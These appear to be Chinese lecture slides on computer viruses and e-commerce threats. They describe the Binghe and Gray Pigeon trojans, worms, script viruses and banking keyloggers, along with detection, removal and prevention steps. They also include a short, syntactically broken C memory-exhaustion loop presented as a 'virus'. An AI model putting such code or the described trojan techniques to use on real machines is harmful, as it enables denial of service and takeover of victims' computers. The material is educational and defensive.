典型病毒1:木马病毒 木马病毒也称做特洛伊木马病毒。木马”病毒是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不刻意地去感染其他文件,它通过将自身伪装吸引用户下载执行。 木马病毒程序一般分为服务器端和客户端两个部分, 服务器端程序一般被伪装成具有吸引力的软件,欺骗用户运行并在运行后自动安装在受害者计算机中,以后程序将随该计算机每次运行而自动加载。 而客户端一般安装在控制者计算机中。当客户端启动后就会在网络中扫描远程主机上事先约定好的端口,这时如果服务器端正在运行就会与客户端连接上,随后服务器端将在被控计算机中接受并执行客户端发出的各种指令,并向客户端返回数据。 用户一旦中毒,就会成为“僵尸”或被称为“肉鸡”,成为黑客手中的“机器人”,黑客可以利用木马窃取用户计算机中的信息,或以利用数以万计的“肉鸡”发送大量伪造包或者是垃圾数据包对预定目标进行拒绝服务攻击,造成被攻击目标瘫痪。 特洛伊木马的故事是在古希腊传说中,希腊联军围困特洛伊久攻不下,于是假装撤退,留下一具巨大的中空木马,特洛伊守军不知是计,把木马运进城中作为战利品。夜深人静之际,木马腹中躲藏的希腊士兵打开城门,特洛伊沦陷。 在使用计算机的过程中如果发现以下现象,则很有可能是感染了“木马”: a. 计算机反应速度明显变慢 b. 硬盘在不停地读写 c.键盘、鼠标不受控制 d.一些窗口被无缘无故地关闭 e.莫名其妙地打开新窗口 f.网络传输指示灯一直在闪烁 g.没有运行大的程序而系统却越来越慢 h.系统资源占用很多 i运行了某个程序没有反映(此类程序一般不大,从十几k到几百k都有) j.在关闭某个程序时防火墙探测到有邮件发出 k.密码突然被改变,或者他人得知您的密码或私人信息 l.文件无故丢失,数据被无故删改 在2006年之前,冰河在国内一直是不可动摇的领军木马,在国内没用过冰河的人等于没用过木马,由此可见冰河木马在国内的影响力之巨大。 目的:远程访问、控制。 选择:可人为制造受害者和寻找"养马场",选择前者的基本上可省略扫描的步骤。 编辑本段具体功能 1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用); 2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息; 3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据; 4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制; 5.远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式)等多项文件操作功能; 6.注册表操作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能; 7.发送信息:以四种常用图标向被控端发送简短信息; 8.点对点通讯:以聊天室形式同被控端进行在线交谈。 从一定程度上可以说冰河是最有名的木马了,就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它,但国内仍有几十万中冰河的电脑存在!作为木马,冰河创造了最多人使用、最多人中弹的奇迹!现在网上又出现了许多的冰河变种程序,我们这里介绍的是其标准版,掌握了如何清除标准版,再来对付变种冰河就很容易了。 冰河的服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。一旦运行G-server,那么该程序就会在C:/Windows/system目录下生成Kernel32.exe和sysexplr.exe,并删除自身。 Kernel32.exe在系统启动时自动加载运行,sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe,但只要你打开 TXT文件,sysexplr.exe就会被激活,它将再次生成Kernel32.exe,于是冰河又回来了!这就是冰河屡删不止的原因
54
补充介绍:一个木马程序的简单例子 注意这个ls程序的内容
55
典型病毒1:木马病毒 木马病毒程序一般分为服务器端和客户端两个部分,服务器端程序一般被伪装成具有吸引力的软件,欺骗用户运行并在运行后自动安装在受害者计算机中,以后程序将随该计算机每次运行而自动加载。而客户端一般安装在控制者计算机中。当客户端启动后就会在网络中扫描远程主机上事先约定好的端口,这时如果服务器端正在运行就会与客户端连接上,随后服务器端将在被控计算机中接受并执行客户端发出的各种指令,并向客户端返回数据。
56
冰河木马病毒举例 国产木马,在2006年之前,冰河在国内一直是不可动摇的领军木马 目的:远程访问、控制。
选择:可人为制造受害者和寻找"养马场",选择前者的基本上可省略扫描的步骤。 功能: 1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用); 2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息; 3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据; 4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制; 5.远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式)等多项文件操作功能; 冰河的服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。一旦运行G-server,那么该程序就会在C:/Windows/system目录下生成Kernel32.exe和sysexplr.exe,并删除自身。 Kernel32.exe在系统启动时自动加载运行,sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe,但只要你打开 TXT文件,sysexplr.exe就会被激活,它将再次生成Kernel32.exe,于是冰河又回来了!这就是冰河屡删不止的原因 在2006年之前,冰河在国内一直是不可动摇的领军木马,在国内没用过冰河的人等于没用过木马,由此可见冰河木马在国内的影响力之巨大。 目的:远程访问、控制。 选择:可人为制造受害者和寻找"养马场",选择前者的基本上可省略扫描的步骤。 1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用); 2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息; 3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据; 4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制; 5.远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式)等多项文件操作功能; 6.注册表操作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能; 7.发送信息:以四种常用图标向被控端发送简短信息; 8.点对点通讯:以聊天室形式同被控端进行在线交谈。 从一定程度上可以说冰河是最有名的木马了,就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它,但国内仍有几十万中冰河的电脑存在!作为木马,冰河创造了最多人使用、最多人中弹的奇迹!现在网上又出现了许多的冰河变种程序,我们这里介绍的是其标准版,掌握了如何清除标准版,再来对付变种冰河就很容易了。 冰河的服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。一旦运行G-server,那么该程序就会在C:/Windows/system目录下生成Kernel32.exe和sysexplr.exe,并删除自身。 Kernel32.exe在系统启动时自动加载运行,sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe,但只要你打开 TXT文件,sysexplr.exe就会被激活,它将再次生成Kernel32.exe,于是冰河又回来了!这就是冰河屡删不止的原因
57
典型病毒2:蠕虫病毒 蠕虫病毒利用网络进行复制和传播,传染途径是通过网络和电子邮件。
最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。 蠕虫病毒不利用文件寄生(有的只存在于内存中), 作为一个独立的程序存在。 2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。 蠕虫病毒主要 的破坏方式是大量的复制自身,然后在网络中传播,严重的占用有限的网络资源,最终引起整个网络的瘫痪,使用户不能通过网络进行正常的工作。 蠕虫病毒常见的传播方式有2种: 1.利用系统漏洞传播——蠕虫病毒利用计算机系统的设计缺陷,通过网络主动的将自己扩散出去。 2.利用电子邮件传播——蠕虫病毒将自己隐藏在电子邮件中,随电子邮件扩散到整个网络中,这也是是个人计算机被感染的主要途径。 由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为 “熊猫烧香”病毒。但原病毒只会对EXE图标进行替换,并不会对系统本身进行破坏。而大多数是中的病毒变种,用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象 里斯是在家里第一次接触计算机。莫里斯的父亲曾从NSA National Security Agency,美国国家安全局 英文缩写NSA带回一台原始的神秘的密码机器,成为一家人的谈资,激起了他的强烈兴趣。他自己12岁就编出高质量电脑程序,18岁时,就具有在最负盛名的贝尔实验室和哈佛大学当过程序员的赫赫经历。难怪有人感叹:他的简历,简直像电脑名人录中的一样。 copyright 1988年冬天,正在康乃尔大学攻读的莫里斯,把一个被称为“蠕虫”的电脑病毒送进了美国最大的电脑网络——互联网。1988年11月2日下午5点,互联网的管理人员首次发现网络有不明入侵者。它们仿佛是网络中的超级间谍,狡猾地不断截取用户口令等网络中的“机密文件”,利用这些口令欺骗网络中的“哨兵”,长驱直入互联网中的用户电脑。入侵得手,立即反客为主,并闪电般地自我复制,抢占地盘。用户目瞪口呆地看着这些不请自来的神秘入侵者迅速扩大战果,充斥电脑内存,使电脑莫名其妙地“死掉”,只好急如星火地向管理人员求援,哪知,他们此时四面楚歌,也只能眼睁睁地看着网络中电脑一批又一批地被病毒感染而“身亡”。当晚,从美国东海岸到西海岸,互联网用户陷入一片恐慌。到11月3日清晨5点,当加州伯克利分校的专家找出阻止病毒蔓延的办法时,短短12小时内,已有6200台采用Unix操作系统的SUN工作站和VAX小型机瘫痪或半瘫痪,不计其数的数据和资料毁于这一夜之间。造成一场损失近亿美元的空前大劫难! 蠕虫病毒是一种通过网络传播的恶性病毒,它除具有病毒的一些共性外,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),对网络造成拒绝服务,以及与黑客技术相结合等等。蠕虫病毒主要的破坏方式是大量的复制自身,然后在网络中传播,严重的占用有限的网络资源,最终引起整个网络的瘫痪,使用户不能通过网络进行正常的工作。每一次蠕虫病毒的爆发都会给全球经济造成巨大损失,因此它的危害性是十分巨大的;有一些蠕虫病毒还具有更改用户文件、将用户文件自动当附件转发的功能,更是严重的危害到用户的系统安全。
58
典型病毒2:蠕虫病毒 安全防护计算机 未及时更新安全漏洞 共享连接 移动存储设备 口令等配置不当 蠕虫病毒传播示意图图
59
典型病毒3:脚本病毒 通常是JavaScript或VBScript等脚本代码编写的恶意代码,利用网页、邮件或 MS Office 文件传播,实现病毒植入,执行脚本代码,脚本病毒一般会修改注册表、修改浏览器设置、利用软件漏洞进行破坏等。脚本病毒具有编写简单、破坏力大、感染力强、欺骗性强等特点。 JS或VBS ActiveX 脚本代码 第三就是Word宏病毒了, MicrosoftWord中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列Word命令,它能使日常工作变得更容易。” 例如,当第一次发现Word 感染该病毒时,会出现一个对话框,对话框中的文本只有一个“1”,按钮也只有一个“OK”键(在中文环境中为“确定”键)。病毒加载之后,就会修改【文件】菜单的【保存】命令所代表的宏,然后在每次保存文件的时候,就会将病毒保存到文件中。 JavaScript是一种能让你的网页更加生动活泼的程式语言,也是目前网页中设计中最容易学又最方便的语言。你可以利用JavaScript轻易的做出亲切的欢迎讯息、漂亮的数字钟、有广告效果的跑马灯及简易的选举,还可以显示浏览器停留的时间。让这些特殊效果提高网页的可观性。 VBScript是Visual Basic Script的简称,即 Visual Basic 脚本语言,有时也被缩写为VBS。是asp动态网页默认的编程语言,配合asp内建对象和ADO对象,用户很快就能掌握访问数据库的asp动态网页开发技术。 在网页服务器方面VBS是微软的Active Server Pages的一部分,它与JavaServer Pages和PHP是竞争对手。在这里VBS的程序码直接嵌入到HTML页内,这样的网页以ASP ActiveX 是一个开放的集成平台,为开发人员、 用户和 Web生产商提供了一个快速而简便的在 Internet 和 Intranet 创建程序集成和内容的方法。 使用 ActiveX, 可轻松方便的在 Web页中插入 多媒体效果、 交互式对象、以及复杂程序,创建用户体验相当的高质量多媒体 CD-ROM 。 在因特网上,ActiveX插件软件的特点是:一般软件需要用户单独下载然后执行安装,而ActiveX插件是当用户浏览到特定的网页时,IE浏览器即可自动下载并提示用户安装。 ActiveX插件安装的一个前提是必须经过用户的同意及确认。 IE一般具有三个安全性层次: 低级,中级和高级。 低级:没有警告 中级:提示用户潜在的风险 高级:提示用户潜在的风险并且禁止控件运行
60
一个耗尽内存的病毒 #include "stdafx.h" #include <malloc.h>
#include <stdlib.h> int main(void) { while(1) malloc( );//表示分配多少个字节的内存空间; } return 0;
61
补充介绍几类其它电子商务病毒……
62
网银大盗 网银大盗 (又名:网银窃贼 Banker keylogger)病毒类型:木马
病毒描述:该病毒通过键盘记录的方式,监视用户操作。当用户使用个人网上银行进行交易时,该病毒会恶意记录用户所使用的帐号和密码,记录成功后,病毒会将盗取的帐号和密码发送给病毒作者,造成经济损失。 传染条件: 该病毒没有主动传播的性质,但容易被人恶意安装或是欺骗安装。 防范: 用户不要在不安全的网址中下载病毒,或是点击QQ等即时通讯中传来的网址。 第一,最好去银行申请网上银行专业版。网上银行专业版一般的黑客没有办法破解,安全性非常高。 第二:如果要登录银行网站,一定要仔细核对网址。同时最好不要轻易打开不认识的邮件,尤其是一些后缀为.exe的可执行文件。 第三:要定期查看“历史交易明细”、和查阅对账单,如发现异常交易或账务差错,立即与银行联系,避免损失。 第四:如果不是采用硬件加密手段,不要在公用计算机上使用网上银行,从而使网上身份识别系统被攻破,网上账户遭盗用。
63
最新截获的“网银窃贼”病毒 本来,许多网上银行都需要连接指定的网关或者读取用户计算机上的数字证书才能使用,所以黑客就算有账户和密码也无法转走资金。 “网银窃贼”的最新变种病毒正是充分考虑到这一点,将盗取技术再度升级,在截取到用户的账号密码后,病毒在被感染计算机上连接黑客指定的服务器站点上,自动将网页跳转到用户所操作的网上银行转账页面,再进行转账。 由于病毒是在用户电脑本机中打开的银行汇款单页面,而用户的数字证书也往往都保存在电脑中,这样病毒就可以绕开数字证书的防护,成功盗取款项。
64
电子商务安全威胁--灰鸽子 灰鸽子是国内一款著名后门。类似冰河、黑洞等软件。 当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。
黑客可以在灰鸽子工作室的网站上花100元下载灰鸽子,在网上花200元就可以找师傅学灰鸽子使用技巧。而黑客一天可以控制上百个用户,网民称之“肉鸡”。 “灰鸽子”的新变种: 该变种在受感染计算机系统中运行后,会将病毒文件复制到系统的指定目录下,并将文件属性设置为只读、隐藏或存档,使得计算机用户无法发现并删除。 该变种还会修改受感染系统注册表中的启动项,使得变种随计算机系统启动而自动运行。 同时恶意攻击者还会窃取计算机用户的键盘操作信息(如:登录帐号、口令等 国家计算机病毒应急处理中心公布,近期出现一个可以诱骗盗取工商银行用户的个人银行账号和密码的恶意木马程序,名为rojan_Banker.YY。 据中心专家介绍,该木马程序可以监控计算机系统中IE浏览器正在访问网页的情况,如果该程序发现用户在工商银行网上银行的登录页面上输入了自己的银行账号和密码,并且进行了提交,那么木马程序借机就会弹出一个和真的一样的伪造IE浏览器窗口。 在这个窗口里可以看到一条文本信息:“为了给您提供更加优良的电子银行服务,6月25日我行对电子银行系统进行了升级。请您务必修改以上信息!”不了解情况的计算机用户会按照显示的信息再一次输入个人用于登录银行的账号密码和支付密码,这样木马程序就成功窃取了计算机用户的银行网上个人账户信息。 此后,木马程序会通过用户的计算机系统内部的邮件系统将窃取到的相关账号和密码信息以邮件的方式发送到指定的邮件地址。在恶意木马程序窃取计算机用户用来登录银行的密码信息的同时,它会自动链接一个网页,并且从该网页上下载一个“灰鸽子”的后门程序到计算机系统内部,这样计算机用户的系统就被恶意攻击者远程控制,接下来会对计算机系统造成更大的破坏。 目前,江民、金山公司的杀病毒软件都已经能够查杀此木马程序。国家计算机病毒应急处理中提醒,最近伪造网络银行登录界面的木马程序比较活跃,在进行网络银行操作的时候,打开杀毒软件的实时监控功能和密码保护功能,防止个人的重要银行信息被恶意木马程序窃取,给自己带来不必要的经济损失。 专家特别指出,这个木马程序很有可能会继续出现新变种,以另外的一种欺骗方式来诱骗计算机用户的个人银行信息。因此计算机用户上互联网进行网络银行交易的时候要提高警惕,如果没有必要尽可能不要随意使用网上银行功能。 灰鸽子 百科名片 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 目录[隐藏] 一、灰鸽子病毒简介 灰鸽子给黑客带来的经济效益 二、灰鸽子的手工检测 三、灰鸽子的手工清除 四、灰鸽子的公告声明 五、灰鸽子工作室 [编辑本段] (1)。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具,。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。 灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。 因涉及互联网安全法律纠纷问题,自2007年3月21日起灰鸽子已全面停止开发和注册[1]。互联网上现存灰鸽子版本为以前所开发灰鸽子软件及其修改版。 (2)作者葛军(1982-? )安徽潜山人,灰鸽子工作室管理员,精通Delphi、ASP、数据库编程,2001年首次将反弹连接应用在远程控制软件上,随后掀起了国内远程控制软件使用反弹连接的热潮,2005年4月,将虚拟驱动技术应用到灰鸽子屏幕控制上,使灰鸽子的屏幕控制达到了国际先进水平。 葛军,“灰鸽子工作室”的创办者,一个低调而又引人注目的程序员。 (3)服务端: 配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改变)。然后黑客利用一切办法诱骗用户运行G_Server.exe程序。 G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端, G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。 Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。 灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互联网上泛滥的局面。 黑客可以在灰鸽子工作室的网站上花100元下载灰鸽子,在网上花200元就可以找师傅学灰鸽子使用技巧。而黑客一天可以控制上百个用户,网民称之“肉鸡”。据黑客王某说,他一天可以抓200只鸡,在江浙发达地区的肉鸡可以一只卖3至4块,普通地区卖1块,一天盗几十个号,好号可以卖几十元甚至1000元,普通的也能是几块钱。平均每月3000元,据王某称这还是小的,有的黑客甚至一月上万元。 个别有不良思想的公司会请黑客们入侵另一家公司,攻击或者窃取资料,然后会付给一些报酬。网上也会有一些人想要“逗逗”朋友或者其他用途,都想恶作剧。常常造成严重的后果。 灰鸽子-变种来袭 国家计算机病毒应急处理中心通过对互联网的监测发现,近期出现了“灰鸽子”的新变种。专家指出,该变种在受感染计算机系统中运行后,会将病毒文件复制到系统的指定目录下,并将文件属性设置为只读、隐藏或存档,使得计算机用户无法发现并删除。该变种还会修改受感染系统注册表中的启动项,使得变种随计算机系统启动而自动运行。 另外,该变种还会在受感染操作系统中创建新的IE进程,并设置其属性为隐藏,然后将病毒文件自身插入到该进程中。如果恶意攻击者利用该变种入侵感染计算机系统,那么受感染的操作系统会主动连接互联网络中指定的服务器,下载其他病毒、木马等恶意程序,同时恶意攻击者还会窃取计算机用户的键盘操作信息(如:登录账户名和密码信息等),最终造成受感染的计算机系统被完全控制,严重威胁到计算机用户的系统和信息安全。 由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。 但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子 服务端。 由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。 1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“ 显示所有文件和文件夹”,然后点击“确定”。 2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。 3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll的文件。 4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。 经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就可以进行手动清除。 经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步: 1、清除灰鸽子的服务; 2、删除灰鸽子程序文件。 注意:为防止误操作,清除前一定要做好备份。 (一)、清除灰鸽子的服务 注意清除灰鸽子的服务一定要在注册表里完成,对注册表不熟悉的网友请找熟悉的人帮忙操作,清除灰鸽子的服务一定要先备份注册表,或者到纯DOS下将注册表文件更名,然后再去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联 2000/XP系统: 1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。 2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。 3、删除整个Game_Server项。 98/me系统: 在9X下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项,我们立即看到名为Game.exe的一项,将Game.exe项删除即可。 (二)、删除灰鸽子程序文件 删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。至此,灰鸽子VIP 2005 服务端已经被清除干净。 以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种,然而仍有极少数变种采用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。 四、防止中灰鸽子病毒需要注意的事项 1. 给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack),其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用,是非常必要的补丁程序 2. 给系统管理员帐户设置足够复杂足够强壮的密码,最好能是10位以上,字母+数字+其它符号的组合;也可以禁用/删除一些不使用的帐户 3. 经常更新杀毒软件(病毒库),设置允许的可设置为每天定时自动更新。安装并合理使用网络防火墙软件,网络防火墙在防病毒过程中也可以起到至关重要的作用,能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁,这点也比较无奈,这部分用户不妨通过使用网络防火墙来进行一定防护 4. 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。 . 下载HijackThis扫描系统 与“熊猫烧香”病毒的“张扬”不同,“灰鸽子”更像一个隐形的贼,潜伏在用户“家”中,监视用户的一举一动,甚至用户与MSN、QQ好友聊天的每一句话都难逃“鸽”眼。专家称,“熊猫烧香”还停留在对电脑自身的破坏,而“灰鸽子”已经发展到对“人”的控制,而被控者却毫不知情。从某种意义上讲,“灰鸽子”的危害及危险程度超出“熊猫烧香”10倍。 “灰鸽子”如何控制电脑牟利 “黑客培训班”教网民通过“灰鸽子”控制别人电脑,“学费”最高200元,最低需要50元,学时一周到一个月不等。 黑客通过程序控制他人电脑后,将“肉鸡”倒卖给广告商,“肉鸡”的价格在1角到1元不等。资深贩子一个月内可以贩卖10万个“肉鸡”。 被控制电脑被随意投放广告,或者干脆控制电脑点击某网站广告,一举一动都能被监视。 直接把文件的路径复制到 Killbox里删除 通常都是下面这样的文件 "服务名"具体通过HijackThis判断 C:\windows\服务名.dll C:\windows\服务名.exe C:\windows\服务名.bat C:\windows\服务名key.dll C:\windows\服务名_hook.dll C:\windows\服务名_hook2.dll 举例说明: C:\WINDOWS\setemykey.dll C:\WINDOWS\setemy.dll C:\WINDOWS\setemy.exe C:\WINDOWS\setemy_hook.dll C:\WINDOWS\setemy_hook2.dll 用Killbox删除那些木马文件,由于文件具有隐藏属性,可能无法直接看到,但Killbox能直接删除. 上面的文件不一定全部存在,如果Killbox提示文件不存在或已经删除就没关系了 灰鸽子自身并不具备传播性,一般通过捆绑的方式进行传播。灰鸽子传播的四大途径:网页传播、邮件传播、IM聊天工具传播、非法软件传播。 1.网页传播:病毒制作者将灰鸽子病毒植入网页中,用户浏览即感染; 2.邮件传播:灰鸽子被捆绑在邮件附件中进行传播; 3.IM聊天工具传播:通过即时聊天工具传播携带灰鸽子的网页链接或文件。 4.非法软件传播:病毒制作者将灰鸽子病毒捆绑进各种非法软件,用户下载解压安装即感染。 以上他们做了命名规则解释,去下载一个木马杀客灰鸽子专杀,清理完后 需要重新启动计算机 服务停止 然后去找那些残留文件,参见上面回答者 软件名称: 灰鸽子(Huigezi、Gpigeon)专用检测清除工具 界面语言: 简体中文 软件类型: 国产软件 运行环境: /Win9X/Me/WinNT/2000/XP/2003 授权方式: 免费软件 软件大小: 414KB 软件简介: 由灰鸽子工作室开发的,针对灰鸽子专用清除器!可以清除VIP2005版灰鸽子服务端程序(包括杀毒软件杀不到的灰鸽子服务端)和灰鸽子 [辐射正式版] 和 DLL版服务端 牵手版服务端 运行DelHgzvip2005Server.exe文件清除VIP2005版灰鸽子服务端程序,运行un_hgzserver.exe文件清除灰鸽子 [辐射正式版] 和 DLL版服务端 牵手版服务 灰鸽子工作室于2003年初成立,定位于远程控制、远程管理、远程监控软件开发,主要产品为灰鸽子远程控制系列软件产品。灰鸽子工作室的软件产品,均为商业化的远程控制软件,主要提供给网吧、企业及个人用户进行电脑软件管理使用;灰 鸽子软件已获得国家颁布的计算机软件著作权登记证书,受著作权法保护。 然而,我们痛心的看到,目前互联网上出现了利用灰鸽子远程管理软件以及恶意破解和篡改灰鸽子远程管理软件为工具的不法行为,这些行为严重影响了灰鸽子远程管理软件的声誉,同时也扰乱了网络秩序。这完全违背了灰鸽子工作室的宗旨和开发灰鸽子远程管理软件的初衷。在此我们呼吁、劝告那些利用远程控制技术进行非法行为的不法分子应立即停止此类非法活动。 应该表明的是,灰鸽子工作室自成立以来恪守国家法律和有关网络管理的规定,具有高度的社会责任感。为有效制止不法分子非法利用灰鸽子远程管理软件从事危害社会的非法活动,在此,我们郑重声明,自即日起决定全面停止对灰鸽子远程管理软件的开发、更新和注册,以实际行动和坚定的态度来抵制这种非法利用灰鸽子远程管理软件的不法行为,并诚恳接受广大网民的监督。 灰鸽子工作室谴责那些非法利用远程控制技术实现非法目的的行为,对于此类行为,灰鸽子工作室发布了灰鸽子服务端卸载程序,以便于广大网民方便卸载那些被非法安装于自己计算机的灰鸽子服务端。卸载程序下载页面。
65
